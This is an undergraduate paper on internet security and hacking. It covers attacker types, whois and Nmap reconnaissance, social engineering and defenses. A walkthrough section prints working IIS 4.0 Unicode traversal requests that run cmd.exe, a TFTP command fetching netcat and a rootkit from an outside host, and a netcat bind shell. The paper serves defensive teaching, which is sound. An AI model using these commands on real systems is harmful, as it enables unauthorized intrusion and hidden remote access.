Internet Security and Hacking

Daniel Guerndt Department of Computer Science University of Wisconsin Platteville guerndtd@uwplatt.edu

Abstract
Companies lose millions of dollars due to bad security practices. More and more users are using the Internet every day and a very small percentage of them know how to defend themselves. It is important to understand how hackers get into systems in order to beat them at their own game. By knowing the tools and tricks of the trade that hackers use, one is better able to defend against an attack. This paper will also talk about a standard attack plan that most attackers follow, defensive programs, how to maximize security, and also how the law punishes convicted offenders of hacking.

Introduction
A hacker is a Database Administrators (DBA) worst nightmare. A company could go bankrupt or loose millions of dollars due to bad security practices. Whether theyre multiple attackers or just a single attacker, the company is totally dependent on the DBA. Some Database Administrators would prefer going into a heavy military war zone then having to defend against an attack [1]. A patient hacker has an unlimited amount of time and resources to try and crack the case.

Types of Attackers
There are three types of attackers, in the form of a pyramid [2]. On the bottom portion of the pyramid exists what is known as Script Kiddies. They have limited knowledge of computer technology and programming. A Script Kiddy simply acquires scripts found on the Internet and deploys their use. In general, they fire off random scripts until something works. They do tend to get caught more frequently due to their lack of knowledge; however, they still pose a dramatic threat to organizations. In the middle of the pyramid exists an IT savvy person. These people understand how to use programming and scripting languages. They also understand vulnerabilities, but in most cases the subject cannot find new vulnerabilities. They are also intelligent enough to use the exploit code and tools with precision. At the top of the pyramid is the cream of the crop. These people have the IQs to boil water. They have the ability to find new vulnerabilities and to write exploit code and tools. Thankfully, the people at the top of the pyramid are limited in numbers. However, they cause the most

problems, not only because of their intelligence level, but also in their general willingness to give out the tools they have made to the public.

The Smart Hacker

A smart hacker is a companys worst nightmare. Do not be fooled into thinking that an attack is not planned. Considering the amount of time an attacker could spend in jail for an assault on an organization, smart hackers come up with elaborate plans. They also have the virtue of patience to an extreme level. A smart hacker knows that traps are occasionally set up in defensive measures and that the most obvious point of entry could end up being the demise of the hacker. They do extensive research on their target, or targets, before unleashing any form of attacks. An attackers main enemy against his or her target is the System Administrator. A System Administrator is in charge of the security of the system. He or she may have others also involved, but the responsibility is on the admin. Suppose the attacker finds out, through research, that the System Administrator is going on a far away vacation for two weeks. If no one understands the System Administrators job, or the security measures set up, the attacker has two full weeks to get access. Even if something goes wrong for the attacker, he or she has a lot of time to get to the root of a system. Once an attacker gets system access, its all over because the attacker can hide his tracks easily from there on. In essence, the attacker is the new unauthorized admin because even the System Administrator cannot find any trails or evidence of the assault. After getting in, a smart hacker will also wait a few weeks for the system administrator to back up the system [3]. This way, if his presence is ever discovered, the attacker is still in the old recovery.

Information a hacker needs

A hacker needs first and for most, information. The first piece of information an attack would want is the targets domain name. If his or her target has a website, that is almost always the first point of research. If the targets website is unknown to the attacker, then he or she would probably search using a whois database. An attacker would want to know the name of the System Administrator or Database Administrator. After obtaining this information, the attacker can probably find out what hours the admin works. He or she would also want to know the operation system of the network and its version number. Every operating system has different vulnerabilities [2]. Without knowing which operating system the network is running on, it can be near to impossible to use vulnerabilities. Version numbers are also very important because some patches kill off old vulnerabilities. If the attacker wants to get access to a database, he or she would also need to find out the type of database ran as well as its version number. Another item an attacker needs is at least one IP address. After obtaining one IP address, the attacker can run a stealth scan of the network.

This stealth scan will provide the attacker with the rest of the IP addresses of the network, all of the open ports on each terminal, and other things, depending on the scanner.

Tools a hacker needs

A hacker also needs tools. All of the tools can be found on the Internet. One of the tools needed for an attack is a way to scan open ports. Every book Ive used came up with two main programs. The first being Netcat. In the hacker community, Netcat is known as the swiss army knife of hacker tools because it has many different features [2]. Netcat is a featured networking utility, which reads and writes data across network connections, using the TCP/IP protocol (http://netcat.sourceforge.net/). Its a reliable back-end tool that can be used directly or easily driven by other programs and scripts. Another program that is widely used is Nmap (http://www.insecure.org/nmap/index.html). Nmap is probably the best stand-alone stealthy port-scanning tool out there. It is considered stealthy because it does not need to fully connect with a TCP connection [4]. The program sends a SYN, and as soon as it receives an ACK, it terminates the connection [4]. All thats needed to use is an IP address or website. Depending on the parameters entered, Nmap can list all IP addresses on a network as well as a list of open ports on each terminal. It also has other features such as detecting the operating system, version number of the operating system, and even IDS and firewall information. However, an attacker will usually only use Nmap for port scanning because everything else is fairly easy to detect. Since these port-scanning tools do not give the operating system and/or database information in a stealthy manor, attackers will often consult whois databases.

Whois Databases
In just about every case, an attacker will consult these databases to the basic research they need to get started. Whois queries provide a hacker with the majority of information that hackers need to begin their attacks [2]. There are four main types of queries: registrar, domain, network, and point of contact [2]. A great place to find registrar information is from http://www.internic.net/whois.html. A target often has several registrars. Internic.net has a rather large listing of associated registrar information. An attacker must determine the correct registrar so that he or she can submit detailed queries to the correct database in subsequent steps [2]. Once the correct registrar is found, a domain query is then the next best approach. A domain query will often provide the name of the registrant, the domain name, the administrative contact, when the record was created and updated, and the primary and secondary DNS servers [2]. This query can also be used at the same site used for registrar information.

A network query maintains specific network blocks that an organization owns. The American Registry for Internet Numbers (ARIN) is a popular database that can be used to determine networks associated with a target domain [2]. The web page for this database is http://www.arin.net. The ARIN database can also be used for point of contact (POC) queries. If an email address is provided in the domain query, it can be used to find more information by searching the ARIN database using the email address directly. Sometimes after doing this, an attacker will find more domains that the attacker did not know about [2]

Social Engineering
An attacker often requires help from the inside of organizations. An attackers main goal in using social engineering is to act as if he belongs. By gaining trusted individuals, he or she may not even have to do any hacking. An old epidemic that happened several years ago was the I LOVE YOU virus that attached to emails and then massively sent it out using a targets address book. The reason this virus had such an impact was due to the subject title. A lot of people that were not IT savvy couldnt help resist to find out who loved them so much [1]. This example was not involved with hacking, however, hackers can use the same ploys to trick people into doing what they want. If an attacker were extremely dedicated to cracking the case of some company, perhaps he or she would go to the headquarters. A perfect demonstration of an attacker arriving at a headquarters is in the following example [3]: After arriving at the target location, the social engineer strikes up small talk with another employee as they walk toward the building. When they arrive at the locked door, the social engineer will pat down his coat pockets, looking for his key or pass card. In such a case, most anyone will do the other guy a favor and let him in with their key. Far from playing the part of the nervous interloper, the social engineer will enter the premises with calm confidence; pretending he truly belongs where he is. All the while, he will move about in a totally unassuming manor, obliquely acknowledging others going about his job. All the while, he will make a point of not attracting attention to himself, unobtrusively scooping the surroundings for tidbits of information that will aid him in his goal. The main systems are typically easy to locate as they are invariably showcased behind large glass walls. The OS of the systems running inside the network will be painfully obvious by the unattended monitors, which display the user interface and even the OS version number. The presence of Sun MicroSystems Sparc hardware in the computer room narrows the OS possibly down to Solaris or RedHat Linux. The toy penguins in the lead developers office are sufficient clue that Linux is widely used. A stroll through the cubicles leads to the discovery of a number of Post-It notes near (or even on) a monitor that reveal a users current login and password combination. The example above may be a bit more extreme, however, everything it stated is quite possible with social engineering skills.

Another issue in social engineering is women. A lot of men dont think of women as IT savvy and will give out more information to them because the men dont think the women can do any damage with it [3].

First step into breaking a system

This step is actually composed of two steps, but the first step is quite simple. The first thing that is required in this case is to find the targets website [3]. Doing a simple Google search on the targets name will often provide an attacker with the desired results. The second part of this step requires the attacker to run some sort of port-scanner [3]. In an example used in Hack Proofing Your Web Applications, they used nslookup in a command prompt. However, Nmap, Netcat or a variety of other programs could have been used. Nslookup can be downloaded and ran in just about any command prompt or used directly at http://www.kloth.net/services/nslookup.php. It mainly just returns an IP address and the domain name, but more information can be found for nslookup on the web. Here is an example of using nslookup [3]: $ nslookup www.targetsite.com Server: localhost Address: 127.0.0.1 Non-authoritative answer: Name: www.targetsite.com Address: 208.37.215.233

Second step into breaking a system

Next we need the rest of the target networks IP address range. One thing an attacker might do is consult the ARIN database using the address we received in the previous step. Otherwise an attacker might use Nmap using its stealth detection to get every IP address running with open ports available. Using the ARIN database would provide the attacker with every IP address allocated to the target. Nmap will not display an IP address that does not have any open ports, so using both methods is generally preferable. Here is an example using the ARIN database and Nmap [3]: $ whois h whois.arin.net 208.37.215.233 Treachery Unlimited (NETBLK-TREACHERY-COM) 208.37.215.0 208.37.215.255 $ nmap sP 208.37.215.0/24 Interesting ports on [208.37.215.233] [The 1529 ports scanned but not shown below are in state: closed] Port State Service 21/tcp open ftp 22/tcp open ssn 23/tcp open telnet 79/tcp open finger 80/tcp open http 143/tcp open imap2

Nmap run completed 256 IP addresses [1 host up| scanned in 360 seconds] From the results from Nmap, there are a lot of possible vulnerabilities from all the different services listed. One of the easiest to try things out on is telnet, which will be used in the steps below. If there are vulnerabilities in the services listed from Nmap, chances are pretty good that a hacker can get access. This Nmap result is actually quite small as well since it scanned 256 IP addresses. However, even one terminal with multiple open ports can lead to serious issues.

Third step into breaking a system

Most web servers are designed to provide their HTTP version and operating system [3]. To get the operating system, we can use telnet and perform a HTTP HEAD request [3]. Here is an example of an attacker using Telnet to his or her advantage [3]: $ telent 208.37.215.233 80 Trying 208.37.215.233 Connected to 208.37.215.233. Escape character is ^]. HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Fri, 16 Feb 2001 18:45:23 GMT Context-Length:526 Context-Type: text/html Connection closed by foreign host. From the results, we find out that the target system uses Microsoft-IIS version 4.0, which has several known vulnerabilities listed on the Internet. It also provides us with the Operating system being Windows NT. The only easy way to get into a system is by exploiting the vulnerabilities of systems. Windows NT has a lot of known vulnerabilities, however, the users can often find patches to fix these vulnerabilities. Here are a couple web pages that list known vulnerabilities: http://cve.mitre.org/cve, www.securityfocus.com, http://packetstorm.securify.com [3]. After checking for Windows NT and Microsoft IIS vulnerabilities, we find 400 known vulnerabilities dated since 1995 [3]. Since remote access is the safest approach, a smart attacker will use the safest vulnerabilities. As a rule of thumb, the latest vulnerabilities are often the least defended against [3].

Fourth step into breaking a system

After finding out a few vulnerabilities that should work, we can use telnet again to try one of them. One of Windows NTs known vulnerabilities is from using Unicode. The Unicode bug tricks the system into executing its command controller-cmd.exe [3]. Here is an example of using this known exploit which tries to write to a file on a system[3]: $ telnet 208.37.215.233 80 Trying 208.37.215.233 Connected to 208.37.215.233.

Escape character is ^]. GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+echo+test+message+> +test.msg HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Fri, 16 Feb 2001 19:20:32 GMT Content-Length: 0 Content-Type: text/plain Connection closed by foreign host. This attempt appears to be successful, but to make sure it successfully worked, we need to try and read the file we attempted to write on the server [3]. If successful, we will be able to read and write on the given server. This will allow us to do just about anything we want to compromise the system. To test the results, use the following GET command after issuing another Telnet connection [3]: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+type+test.msg If the result shows test message, which is the title of the file created earlier, it was successful. This pretty much allows the attacker to do anything he or she wants [3]. To issue the full scale attack, the attacker needs a few tools to get the job done. A rootkit is needed to hide the attackers tracks [3]. Rootkits can be downloaded and used from many different sites on the Internet. The correct rootkit must be downloaded based on the operating system, or whatever attack is being done. Another necessary item is a way to bind a specified port on the target system in order to log in directly [3]. The program used in this example is Netcat. With these two tools, the attack can be issued.

The Attack
The attacker needs a way to download the rootkit and Netcat into the target system. Since Windows NT does not support passive FTP, the attacker must use TFTP (Trivial File Transfer Protocol). In order to use TFTP, the attacker issues the following GET [3]: GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+i+216.240.45.60+GET+nc.exe The attacker then must download Netcat and the rootkit using TFTP. This can be done by using a two separate GETs for the files by replacing nc.exe with the file names of the rootkit and Netcat [3]. After the items are downloaded onto the server, the attacker must issue a Netcat command to bind a port for the attackers use. Here is an example of using the GET command to bind a port using Netcat [3]: GET /scripts/.%c1%9c../winnt/system32/cmd.exe?/c+nc.exe-1+-p+100+-t+e+cmd.exe The port cannot be an open port already in use by the system, so for this example, port 100 is used. After this step, the attacker issues one final command to get system access [3]: $ telnet 208.37.215.233 100 Trying 208.37.215.233. Connected to 208.37.215.233. Escape character is ^]. C:\winnt\system32\>

This whole process may seem a bit complicated, but these vulnerabilities are clearly listed on the Internet. They sometimes show a step-by-step process just like I have gone through. After the attacker has system access, he or she would put in the rootkit to hide everything that has just happened from the System Administrator.

Defending against attacks

The best approach of defense against an attack is through patching. Vendors will fix known vulnerabilities as soon as they hear about them. A System Administrator should look for these patches on a daily basis. If an attacker cannot find vulnerability on a system, it is considerably harder to hack into a system. Firewalls are also necessary. The less open ports to the public, the better chance a known vulnerability can be used. However, firewalls also have known vulnerabilities [3], so firewall information must be kept confidential. A companies website must also not reveal any incriminating information. All of the information needed to hack a site must not be on a website. Also be careful what information is released to Whois databases[3]. If the attacker cannot find out who the System Administer is, he or she could run into problems. If an attacker cannot find the needed information, he or she will often give up, unless dedicated to the attack. Companies also need to be careful about what is displayed at their company site. Having little toy penguins hanging around in offices does not help security. Displaying server information to the public is also a bad idea. Companies many want to lock down the server rooms completely and remove sticker labels from hardware. Only let trusted individuals into the server room. Another useful tool is an intrusion detection system (IDS). These find bad traffic, but do not necessarily stop it [1]. They always monitor the network for abnormal conditions both internally and externally in the network and provide another security level [1]. IDSs can be completely passive and therefore not directly detectable by an attacker [1]. There are a lot of free IDSs available to the public, however paying for one is probably the best approach since attackers have less access to them. 70% of all attacks come from trusted employees [3]. Employees occasionally become disgruntled and think they can get away with anything. In some cases, this is true, but there should be several internal security measures set up. All code must be documented properly. If a programmer quits an organization and the code worked on is not documented properly, they may have left malicious code hidden inside. This can require the company to do a fullscale safety check in the software costing time and money. However, with proper documentation and organization, its much easier to find such obstacles.

A System Administrator could also set up an easy entry point for which he wants to draw hackers into. A trap like this, if properly set up, will get flagged immediately and hopefully some information about the hacker is left behind.

Law and Hacking

An unwanted intrusion of a system is regarded as an extreme offense. It is often considered a felony. If convicted, the accused hacker can face many years in jail and huge fines. The charge is based on how much damage the hacker did against a company, the attackers age, the target, etc. If the hacker caused enough damage, the attacker should expect to stay in jail for more then five years, with up to a $250,000 fine. Another thing to take note of before running off and starting to hack is having the felony label over ones head. A convicted offender would have an extremely hard time getting near a computer, or an IT job.

Conclusion
There are many types of hackers out there, all of whom are dangerous. To successfully penetrate a system, an attacker needs tools and information. There is nothing you can do to stop hacking tools from being spread around, but you can protect yourself from an invasion by hiding information. Anything is penetrable, no matter how secure. However, the more secure a network is, the harder it is to crack. Not all hacking is done over the Internet. Be weary of disgruntled employees and social engineering ploys. Disgruntled employees do the majority of all attacks. The best way to protect a network from invasion is by getting the latest patches from vendors. This in itself will cancel out hundreds of known vulnerabilities and make a system, or network, much safer.

References
[1] Ahmad, David R. Mirza.; Russel, Ryan. Hack Proofing Your Network. Rockland: Syngress Publishing, Inc. 2002. [2] McClure, Stuart; Scambray, Joel; Kurtz, George. Hacking Explosed: Network Security Secrets & Solutions. Fourth Edition. Berkeley: Nordin. 2003. [3] Hack Proofing Your Web Applications: The Only Way to Stop a Hacker is to Think Like One. Rockland: Syngress Publishing, Inc., 2001. [4] Chirillo, John. Hack Attacks Testing: How to Conduct Your Own Security Audit. Indianapolis: John Wiely & Sons, Inc. 2003.